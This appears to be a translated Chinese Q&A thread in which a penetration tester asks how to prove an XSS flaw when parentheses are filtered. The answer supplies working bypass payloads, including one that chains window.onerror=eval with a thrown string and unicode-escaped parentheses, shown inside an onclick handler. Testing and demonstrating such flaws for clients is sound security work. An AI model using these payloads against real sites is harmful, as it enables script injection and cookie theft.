我在客户端的应用程序中发现了Cross Site Scripting漏洞。问题是易受攻击的参数不接受括号。因此,alert(document.cookie)之类的内容因括号而被拒绝。我可以使用alert `xss`获取XSS,但我的客户端需要能够访问DOM的证明。
换句话说,我如何alert(document.cookie)没有括号,有没有其他选择?
谢谢!
答案 0 :(得分:6)
document.body.innerHTML=document.cookie将在页面上显示Cookie。
说到XSS漏洞:是的,它很脆弱,禁用括号只会迫使攻击者使用更多创造性方法。让某人执行任何任意代码是一种责任。
这是一个简单的示例,说明如何使用任何参数调用任何函数,而不使用输入中的任何括号:
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>
<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">